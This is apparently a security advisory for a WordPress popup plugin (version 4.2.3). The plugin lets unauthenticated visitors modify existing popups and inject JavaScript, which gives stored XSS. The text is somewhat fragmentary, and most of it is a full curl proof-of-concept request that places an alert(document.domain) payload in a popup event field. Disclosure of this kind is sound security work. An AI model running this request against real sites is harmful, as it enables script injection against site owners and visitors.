Description The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
$POPUPID
with that popup’s ID: curl --url 'http://vulnerable-site.tld/' --data 'sgpb-is-preview=1&blah;[name]=sgpb-is-preview&blah;[value]=0&post;_ID=$POPUPID&sgpb-target;%5B0%5D%5B0%5D%5Bparam%5D=everywhere&sgpb-type;=html&sgpb-is-active;=checked&sgpb-events;%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events;%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Bparam%5D=contact-form-7&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Boperator%5D=redirect-url&sgpb-behavior-after-special-events;%5B0%5D%5B0%5D%5Bvalue%5D=https%3A%2F%2Fexample.com&sgpb-popup-z-index;=9999&sgpb-popup-themes;=sgpb-theme-1&sgpb-overlay-color;=&sgpb-overlay-opacity;=0.8&sgpb-content-custom-class;=sg-popup-content&sgpb-esc-key;=on&sgpb-enable-close-button;=on&sgpb-close-button-delay;=0&sgpb-close-button-position;=bottomRight&sgpb-button-position-top;=&sgpb-button-position-right;=9&sgpb-button-position-bottom;=9&sgpb-button-position-left;=&sgpb-button-image;=&sgpb-button-image-width;=21&sgpb-button-image-height;=21&sgpb-border-color;=%23000000&sgpb-border-radius;=0&sgpb-border-radius-type;=%25&sgpb-button-text;=Close&sgpb-overlay-click;=on&sgpb-popup-dimension-mode;=responsiveMode&sgpb-responsive-dimension-measure;=auto&sgpb-width;=640px&sgpb-height;=480px&sgpb-max-width;=&sgpb-max-height;=&sgpb-min-width;=120px&sgpb-min-height;=&sgpb-copy-to-clipboard-message;=Copied+to+Clipboard%21&sgpb-open-animation-effect;=No+effect&sgpb-close-animation-effect;=No+effect&sgpb-enable-content-scrolling;=on&sgpb-popup-order;=0&sgpb-popup-delay;=0&sgpb-ShouldOpen;=alert%28document.domain%29%3B&sgpb-WillOpen;=&sgpb-DidOpen;=&sgpb-ShouldClose;=&sgpb-WillClose;=&sgpb-DidClose;=&sgpb-css-editor;='
3) Visit the siteCPE | Name | Operator | Version |
---|---|---|---|
eq | 4.2.3 |